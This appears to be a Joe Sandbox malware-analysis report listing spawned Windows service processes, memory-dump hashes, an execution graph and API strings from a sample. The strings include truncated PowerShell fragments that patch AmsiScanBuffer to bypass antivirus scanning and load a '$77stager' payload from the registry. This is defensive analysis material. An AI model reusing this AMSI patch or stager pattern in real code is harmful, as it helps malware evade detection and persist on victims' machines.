Commandline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
Imagebase: 0x7ff67e6d0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 18
Start time: 12:53:11
Start date: 14/12/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
Imagebase: 0x7ff67e6d0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 19
Start time: 12:53:12
Start date: 14/12/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
Imagebase: 0x7ff67e6d0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 20
Start time: 12:53:12
Start date: 14/12/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
Imagebase: 0x7ff67e6d0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 21
Start time: 12:53:13
Start date: 14/12/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
Imagebase: 0x7ff67e6d0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 22
Start time: 12:53:14
Start date: 14/12/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
Imagebase: 0x7ff67e6d0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 23
Start time: 12:53:14
Start date: 14/12/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
Imagebase: 0x7ff67e6d0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 24
Start time: 12:53:15
Start date: 14/12/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
Imagebase: 0x7ff67e6d0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 25
Start time: 12:53:15
Start date: 14/12/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
Imagebase: 0x7ff67e6d0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

                                                                                                                                Target ID:26
                                                                                                                                Start time:12:53:15
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:28
                                                                                                                                Start time:12:53:16
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:29
                                                                                                                                Start time:12:53:17
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:30
                                                                                                                                Start time:12:53:18
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:31
                                                                                                                                Start time:12:53:18
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:32
                                                                                                                                Start time:12:53:19
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:33
                                                                                                                                Start time:12:53:20
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:34
                                                                                                                                Start time:12:53:20
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:35
                                                                                                                                Start time:12:53:21
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:36
                                                                                                                                Start time:12:53:21
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:37
                                                                                                                                Start time:12:53:22
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:38
                                                                                                                                Start time:12:53:22
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:39
                                                                                                                                Start time:12:53:25
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:40
                                                                                                                                Start time:12:53:25
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:41
                                                                                                                                Start time:12:53:25
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\spoolsv.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\spoolsv.exe
                                                                                                                                Imagebase:0x7ff6367f0000
                                                                                                                                File size:842'752 bytes
                                                                                                                                MD5 hash:0D4B1E3E4488E9BDC035F23E1F4FE22F
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:42
                                                                                                                                Start time:12:53:26
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:43
                                                                                                                                Start time:12:53:26
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1407488881.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4ade0000_RdLfpZY5A9.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: H
                                                                                                                                  • API String ID: 0-2852464175
                                                                                                                                  • Opcode ID: bcb8c97ab0ceb30ea07641faebb11d5cad3ac70917fa5e698a5af0c8e1fa968e
                                                                                                                                  • Instruction ID: 9ba7724c02a6aa713d59ab74902a80aecdb3a198e593972984d4e206ef3ecc8e
                                                                                                                                  • Opcode Fuzzy Hash: bcb8c97ab0ceb30ea07641faebb11d5cad3ac70917fa5e698a5af0c8e1fa968e
                                                                                                                                  • Instruction Fuzzy Hash: C63178A288E7C25FD3436B749C664A17FB0DE4722070A40EBD8C4CF8A3D51C699AC762
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1407488881.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4ade0000_RdLfpZY5A9.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8d49ca86f22e0a622569605d5112386f9c8c757510cfa6a65cb930bbe2ff2fc7
                                                                                                                                  • Instruction ID: 5cc12934cc298bf7e8a28954e5d726e86ce9af87b72fadb5d6a87c86e7b1c769
                                                                                                                                  • Opcode Fuzzy Hash: 8d49ca86f22e0a622569605d5112386f9c8c757510cfa6a65cb930bbe2ff2fc7
                                                                                                                                  • Instruction Fuzzy Hash: 4131C662B0DA895FE786BF789C592B97BE1EFAA341B1800FBE449C3193DD189C058351
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1407488881.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4ade0000_RdLfpZY5A9.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 33e5eb3414f0c36253fd3a25409a17592264b8c136497743c9b2232464d764dc
                                                                                                                                  • Instruction ID: 3ddf0869939e02f79fc837911bc0adf1e41c45071214b30efd4061d14cac884c
                                                                                                                                  • Opcode Fuzzy Hash: 33e5eb3414f0c36253fd3a25409a17592264b8c136497743c9b2232464d764dc
                                                                                                                                  • Instruction Fuzzy Hash: 3B714C70A199099FEB99EF78D458BAD77E2FF58314F2005A8E45AC36D6CE389C41CB40
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1407488881.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4ade0000_RdLfpZY5A9.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ec2222f9e5ff8b7ea311606d7cd4a114255240c38f5d8d2c822d5f554627bd4a
                                                                                                                                  • Instruction ID: 2eedad755066f36e375367228ad97e9a3d4140426e9d9cc4ed5b4c2881a47712
                                                                                                                                  • Opcode Fuzzy Hash: ec2222f9e5ff8b7ea311606d7cd4a114255240c38f5d8d2c822d5f554627bd4a
                                                                                                                                  • Instruction Fuzzy Hash: 38217161B19D495FEB84FE6CC8596BD77D1EB98345B0400BAE40DC3292DD24A8018740
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1407488881.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4ade0000_RdLfpZY5A9.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1587c414008d343b384e04202fa5df17bed6074d65ce062c0b3cb45ab15efba5
                                                                                                                                  • Instruction ID: 6d20549fbc0fc394496178fb1e9fa3eeee555cd45522c2dadfce9932de27e984
                                                                                                                                  • Opcode Fuzzy Hash: 1587c414008d343b384e04202fa5df17bed6074d65ce062c0b3cb45ab15efba5
                                                                                                                                  • Instruction Fuzzy Hash: AF11A0B1D08A485FEB44DFB8C8452EE7BF1EF58310F144169D444E7282DB389946CB51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1407488881.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4ade0000_RdLfpZY5A9.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 91a8cacac5a566f3bd040f51f0cd7ae22a878642e1c8eef4c951a0faf4f78d95
                                                                                                                                  • Instruction ID: 93963574af7cb8fae810c2b9ca2fce9d0f954d01dded1d95cb56796aaf4d2ddd
                                                                                                                                  • Opcode Fuzzy Hash: 91a8cacac5a566f3bd040f51f0cd7ae22a878642e1c8eef4c951a0faf4f78d95
                                                                                                                                  • Instruction Fuzzy Hash: B1012671B5DE8A0FD394EB38E8921BA73D1EF88204B5009B5C949C3782DA28E84287C5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1407488881.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4ade0000_RdLfpZY5A9.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d2cf156f5596f92da3f7110a15a7e7ff9bc9ff1754aa1d1db9b77a8fc11547ba
                                                                                                                                  • Instruction ID: fb1b3f5fa3ee2cb9546c7c3a4760cbf9e335f5674ecb6900186aca0295c91afe
                                                                                                                                  • Opcode Fuzzy Hash: d2cf156f5596f92da3f7110a15a7e7ff9bc9ff1754aa1d1db9b77a8fc11547ba
                                                                                                                                  • Instruction Fuzzy Hash: E5F02870B6E95B5BE794FA3CE4425BA73D5EF88314B6009B5D90EC3782CD28A84287C4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1407488881.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4ade0000_RdLfpZY5A9.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: cc54250326a35fa8d4c55b1bb77df03f58f78b464f5ba19af5f931c9f38b4f48
                                                                                                                                  • Instruction ID: cd70f6a3b28678456023a681e321540b82c44facd4e824c768ea5c0bc79fd780
                                                                                                                                  • Opcode Fuzzy Hash: cc54250326a35fa8d4c55b1bb77df03f58f78b464f5ba19af5f931c9f38b4f48
                                                                                                                                  • Instruction Fuzzy Hash: 99F0D17076D95A5BD794BA38E44167E73D1EB88700B600979D80EC3781DE28A84287C5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1407488881.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4ade0000_RdLfpZY5A9.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4cd8a0777ae23c19b58346ed0661b373dc3da76c2da9f44fa73dd35f48bb8b6e
                                                                                                                                  • Instruction ID: 7ad9e1cb206c626a3a3902787c6b9afd2b7c4b1034775774fb58b380ab68816d
                                                                                                                                  • Opcode Fuzzy Hash: 4cd8a0777ae23c19b58346ed0661b373dc3da76c2da9f44fa73dd35f48bb8b6e
                                                                                                                                  • Instruction Fuzzy Hash: 22E08651F5DD0A0BF79C7ABC68662B9A7C5DB88210F914575E41EC26C3EC0DDC829245

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:72.1%
                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                  Signature Coverage:58.4%
                                                                                                                                  Total number of Nodes:101
                                                                                                                                  Total number of Limit Nodes:11
                                                                                                                                  execution_graph 238 7c1798 241 7c17a5 FindResourceA 238->241 242 7c17c5 SizeofResource 241->242 243 7c179d ExitProcess 241->243 242->243 244 7c17d8 242->244 244->243 245 7c17e4 LockResource RegOpenKeyExW 244->245 245->243 246 7c180b RegSetValueExW 245->246 246->243 247 7c1822 246->247 259 7c1868 GetProcessHeap HeapAlloc StrCpyW 247->259 251 7c1835 252 7c1674 9 API calls 251->252 253 7c1841 252->253 306 7c112f GetCurrentProcess IsWow64Process 253->306 257 7c1854 257->243 319 7c151a SysAllocString SysAllocString CoInitializeEx 257->319 329 7c1159 259->329 261 7c1893 262 7c189d StrCatW 261->262 263 7c18c5 StrCatW StrCatW 261->263 264 7c112f 2 API calls 262->264 332 7c19e1 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 263->332 266 7c18aa StrCatW StrCatW 264->266 266->263 271 7c1986 6 API calls 272 7c18f0 271->272 273 7c1986 6 API calls 272->273 274 7c18fc 273->274 275 7c1986 6 API calls 274->275 276 7c1908 275->276 277 7c1986 6 API calls 276->277 278 7c1914 277->278 279 7c1986 6 API calls 278->279 280 7c1920 279->280 281 7c1986 6 API calls 280->281 282 7c192c 281->282 283 7c1986 6 API calls 282->283 284 7c1938 283->284 285 7c1986 6 API calls 284->285 286 7c1944 285->286 287 7c1986 6 API calls 286->287 288 7c1950 287->288 289 7c1986 6 API calls 288->289 290 7c195c 289->290 291 7c1986 6 API calls 290->291 292 7c1968 291->292 293 7c1986 6 API calls 292->293 294 7c1974 293->294 295 7c1986 6 API calls 294->295 296 7c1827 295->296 297 7c1674 SysAllocString SysAllocString CoInitializeEx 296->297 298 7c16a7 CoInitializeSecurity 297->298 299 7c1782 297->299 300 7c16bd 298->300 301 7c16c8 CoCreateInstance 298->301 302 7c1785 SysFreeString SysFreeString 299->302 300->301 305 7c172d CoUninitialize 300->305 303 7c16ea VariantInit 301->303 301->305 302->251 303->305 305->302 307 7c114e 306->307 308 7c11ad 7 API calls 307->308 309 7c1209 
CoInitializeSecurity 308->309 310 7c14f0 308->310 311 7c121f 309->311 312 7c122a CoCreateInstance 309->312 313 7c14f3 6 API calls 310->313 311->312 316 7c1444 CoUninitialize 311->316 314 7c124c VariantInit 312->314 312->316 313->257 317 7c128f 314->317 316->313 317->316 318 7c13dd VariantInit VariantInit VariantInit 317->318 318->316 320 7c154d CoInitializeSecurity 319->320 321 7c165f SysFreeString SysFreeString 319->321 322 7c156e CoCreateInstance 320->322 323 7c1563 320->323 321->243 324 7c1659 CoUninitialize 322->324 325 7c1590 VariantInit 322->325 323->322 323->324 324->321 326 7c15d3 325->326 327 7c1605 VariantInit 326->327 328 7c162b 326->328 327->328 328->324 352 7c118e GetModuleHandleA 329->352 331 7c1178 331->261 355 7c1000 CryptAcquireContextW 332->355 335 7c18d8 345 7c1986 lstrlenW 335->345 336 7c1a37 StrStrIW 344 7c1a9d 336->344 337 7c1a57 StrStrIW StrNCatW StrCatW 339 7c1b41 StrCatW StrStrIW 337->339 337->344 338 7c1b71 6 API calls 338->335 339->344 340 7c1b27 StrCatW 340->339 340->344 341 7c1afb StrCatW StrNCatW 342 7c1b18 StrCatW 341->342 342->340 343 7c1adf StrCatW StrCatW 343->342 344->337 344->338 344->340 344->341 344->343 358 7c104b 345->358 348 7c18e4 348->271 349 7c19b3 StrStrIW 349->348 350 7c19bf 349->350 351 7c19c0 StrStrIW 350->351 351->348 351->351 353 7c119d GetProcAddress 352->353 354 7c11aa 352->354 353->331 354->331 356 7c1028 CryptGenRandom CryptReleaseContext 355->356 357 7c1044 355->357 356->357 357->335 357->336 359 7c1000 3 API calls 358->359 360 7c1076 359->360 360->348 360->349

                                                                                                                                  Callgraph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  • Opacity -> Relevance
                                                                                                                                  • Disassembly available
                                                                                                                                  callgraph 0 Function_007C1798 10 Function_007C17A5 0->10 1 Function_007C1159 6 Function_007C118E 1->6 2 Function_007C151A 3 Function_007C1674 4 Function_007C10B1 5 Function_007C11AD 7 Function_007C112F 8 Function_007C1868 8->1 8->7 11 Function_007C1986 8->11 13 Function_007C19E1 8->13 9 Function_007C104B 12 Function_007C1000 9->12 10->2 10->3 10->5 10->7 10->8 11->9 13->4 13->12

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,007C1827,?,?,?,?,?,007C179D), ref: 007C1872
                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,007C179D), ref: 007C1879
                                                                                                                                  • StrCpyW.SHLWAPI(00000000,007C222C), ref: 007C1888
                                                                                                                                  • StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 007C18A3
                                                                                                                                    • Part of subcall function 007C112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,007C18AA,?,?,?,?,?,007C179D), ref: 007C113D
                                                                                                                                    • Part of subcall function 007C112F: IsWow64Process.KERNEL32(00000000,?,?,007C18AA,?,?,?,?,?,007C179D), ref: 007C1144
                                                                                                                                  • StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 007C18BB
                                                                                                                                  • StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 007C18C3
                                                                                                                                  • StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$77stager`)).EntryPoint.Invo), ref: 007C18CB
                                                                                                                                  • StrCatW.SHLWAPI(00000000,007C222C), ref: 007C18CF
                                                                                                                                  Strings
                                                                                                                                  • NativeMethods, xrefs: 007C1908
                                                                                                                                  • ReturnType, xrefs: 007C18F0
                                                                                                                                  • LoadLibraryDelegate, xrefs: 007C1920
                                                                                                                                  • GetProcAddress, xrefs: 007C1914
                                                                                                                                  • LoadLibraryPtr, xrefs: 007C1944
